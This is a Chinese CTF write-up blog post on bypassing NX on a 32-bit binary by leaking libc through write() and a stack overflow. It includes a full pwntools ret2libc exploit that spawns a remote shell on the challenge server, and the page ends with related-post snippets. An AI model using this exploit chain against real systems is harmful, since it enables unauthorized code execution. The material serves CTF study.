CTF中的PWN——绕NX防护2(泄露libc + 栈溢出)

最新推荐文章于 2023-12-04 00:44:57 发布
最新推荐文章于 2023-12-04 00:44:57 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39194641/article/details/102698265
版权

前言:

    继续PWN的学习,今天整理一下绕过NX,同时libc本地不存在需要通过相应函数泄露地址的方式进行进行溢出。

本题工具介绍:

  • LibcSearcher 

    一个基于libc_database写的python库,可以通过泄露的函数实际地址查找对应的libc版本。

from LibcSearcher import *

#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")

    本题 通过write函数实际地址找到远程的libc,然后dump出其他函数的offset。

  • libc_database

    ./add 用来添加libc库

./add /usr/lib/libc-2.21.so

    ./find 用来查找libc版本

$ ./find printf 260
archive-glibc (id libc6_2.19-10ubuntu2_i386)

    ./dump 用来输出libc中的一些函数的偏移

$ ./dump libc6_2.19-0ubuntu6.6_i386
offset___libc_start_main_ret = 0x19a83
offset_system = 0x00040190
offset_dup2 = 0x000db590
offset_recv = 0x000ed2d0
offset_str_bin_sh = 0x160a24

    本题找到远程加载的libc版本后使用此工具dump出其他函数的offset。

题目:(new bugku pwn7)

    检查程序详细信息,发现为32bit,开启着NX,同时 RELRO:    Partial RELRO。

    放入IDA中静态分析,发现read()危险函数,主函数有write函数:

    此题目思路:使用wirte函数泄露出(wirte/__libc_start_main)等实际地址,查找对应的libc动态链接库,通过此库查找系统函数的偏移,计算相应的实际地址,溢出即可。构造payload如下:

from pwn import *

context.log_level = "debug"

#p = process('./pwn7')
p = remote('114.116.54.89',10007)
elf = ELF('./pwn7')

write_plt = elf.plt['write']
write_got = elf.got['write']
print write_got
libc_start_main_got = elf.got['__libc_start_main']
main_addr = 0x0804846B
offset_write = 0x000d43c0
offset_system = 0x0003a940
offset_str_bin_sh = 0x15902b

payload = 'A' * 40 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

p.sendlineafter('plz input your name:\n',payload)
write_addr = u32(p.recv(4))
libc_base = write_addr - offset_write
sys_addr = libc_base + offset_system
sh_addr = libc_base + offset_str_bin_sh

payload = 'A' * 40 + p32(sys_addr) + 'nEIP' + p32(sh_addr)
p.sendline(payload)
p.interactive()

    脚本运行结果如下:

 

    注:常用的32bit带参溢出的方式中会使用4byte代替PUSH EIP来骗过CPU,但是此软件要通过溢出泄露出write函数的实际地址后继续溢出,那么就需要将返回地址填充想要继续执行的指令的地址;

           针对本地的调用wirte@plt函数,在构造参数的时候是p32(1) + p32(write_got) +p32(4)作为write函数的参数,其中“1”表示的是标准输出,而0代表标准输入。“4”代表4字节。

总结:

  • 关于绕过NX的方式:
  1. 软件有system函数的直接用;
  2. 程序自带libc,直接elf.symbols['system']  elf.search(''/bin/sh)或使用one_gadgat构造ROP链;
  3. 需要泄露远端libc版本,一般使用puts/write泄露地址,计算基地址。
壊壊的诱惑你
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2783
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
gdb 查看是否 栈溢出_入坑 CTF-PWN栈溢出入门
weixin_36064196的博客
01-17 757
好久没看过pwn题目了,写一个入门的教程顺便复习了:1. 安装gdb-pedagit clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbinitecho "DONE! debug your program with gdb and enjoy"2. 一些比较有用的技巧...
CTF PWN绕过ASLR和NX的三种利用方式
蚁景网安学院
09-04 1005
author:giantbranch作者简介:考上大学因为分数不算太好,被分配到了信息安全专业,一开始只是随便跟着学,后来一个偶然的机会跟着一个校园团队去搞web开发,微信开发去了,也挺...
CTFPWN——NX防护1(本地libc 栈溢出
壊壊的诱惑你的博客
09-29 4303
进阶到防护篇了,首先学一下NX防护的基础题目。 NX防护 NX是数据与程序的分水岭,栈溢出核心思想是通过局部变量覆盖函数返回地址来修改EIP和注入 Shellcode,在函数返回时跳到Shellcode去执行。要防止这种攻击,最有效的办法就是让攻击者注入的Shellcode无法执行,这就是数据执行保护(Data Execution Prevention, DEP)安全机制的初衷...
泄露libc
inquisiter
01-12 1546
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如"%n"和"%12$p"这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
pwn】orw&rop --泄露libc基址,orw
最新发布
question55的博客
12-04 239
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 683
pwn 64位 泄露libc版本
CTF特训营》——PWN:二进制安全基础
PICACHU+++的博客
08-13 2939
即DEP,是进制程序在非可执行的内存区执行指令。在80x86体系,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
pwn环境搭建_CTFpwn题的搭建
weixin_39864373的博客
12-19 1765
2017年5月11日 补:1、socat 有参数reuseaddr,使用的时候加上这个,顾名思义,这个参数的意思就是地址(端口)重用,是为了防止socat绑定失败或者由于某些情况退出时,重新使用此端口需要等待2分钟的时间。如果端口忙,但TCP状态位于 TIME_WAIT ,可以重用端口。如果端口忙,而TCP状态位于其他状态,重用端口时依旧得到一个错误信息,指明”地址已经使用”。如果你的服务程序...
ROP;Ret2libc应用详解;CTF-pwn writeup;pwntools,one_gadget应用
CHERRY_cong的博客
05-01 649
ROP;Ret2libc; CTF-pwn题writeup;pwntools,one_gadget解题 pwn1 逆向代码 // IDA 7.5 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+0h] [rbp-30h] BYREF init(); puts("Show me your code :D"); gets(buf, argv); return 0
CTF|栈溢出入门题hellopwn解题思路
skyattractive的博客
05-31 1658
CTF|栈溢出入门题hellopwn解题思路及个人总结 解题思路 将题目下载下来后拖入虚拟机ubuntu,利用checksec hellopwn 查到有关文件保护信息 NX enabled 表示这个文件NX保护已经打开(个人总结会写各种保护) 输入./hellopwn命令行将文件运行 走一边流程,发现程序很简单 拖入IDA 按照往常一样去找栈溢出的地方,这里我们找到了read这个函数,读入10个字节 (伪代码一些函数和变量的名字我自行修改了,方便观看) 题意很明显,我们只需让v2等于1853186
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 251
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
什么是gadget,以及64位libc如何泄露的问题
qq_43557177的博客
04-06 3174
最近开始学PWN,本以为栈溢出也就那些东西,看来是我少虑了… 在这里对这几天所学习的64位栈溢出泄露Libc的相关知识做一个小总结,当然,如果可以帮助到在读文章的你就更好啦。如果文有错误,也希望各位大佬予以斧正。 什么是LIbc? 这个就是libc 这是一个动态链接文件 那么什么是动态链接和静态链接? 可以理解为: 静态链接:在程序编译的过程,就预先把代码加载进程序 //比如大家都经常写的...
PWN入门(7)NX enabled与返回LibC
Ba1_Ma0的博客
09-23 1374
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入06文件夹,32位程序文件夹。
BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
半岛铁盒的博客
08-18 370
思路 我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。 from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26441) elf=ELF('./level4') write_plt=elf.plt['write'] read_got=elf.g..
Pwn笔记
caterpillarous的博客
04-18 2640
Pwn笔记 -前言 以下内容摘自Wiki: Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战已经完全被击败(例如:”You just got pwned!”)。 在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或...
CTF泄漏libc基址的方法
liucc09的博客
01-05 4028
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
[BUUCFT]PWN——pwn2_sctf_2016(整数溢出+泄露libc
mcmuyanga的博客
10-05 4001
pwn2_sctf_2016[整数溢出+泄露libc] 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看看大概的执行情况 32位ida载入,shift+f12检索程序里的字符串,没有看到现成的system和‘/bin/sh’,加上开启了NX保护,估计是泄露libc类型的题目 从main函数开始看程序,main函数就调用了一个vuln函数 注意第7行的输入函数不是get,是程序自定义的函数get_n, 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是un
7.pwn入门新手练习NX 栈不可执行的绕过方式--ROP链
qiudalaojiao的博客
02-18 1028
文件地址 提取码5o0a 我们先看看它开了那些保护 看到了 只开了nx 漏洞很明显 可以看到 buf 这个字符串数组只有0x80的大小,但是却可以 read 0x200 个字节 多出来的 0x200-0x80 就会造成溢出 32位程序默认调用函数的方式为先将参数压入栈,靠近call指令的是第一个参数 而64位程序默认调用函数的方式则不同 RDI 存放第1个参数 RSI 存放第2个参数 RD...
pwn+栈溢出解题思路
11-10
pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值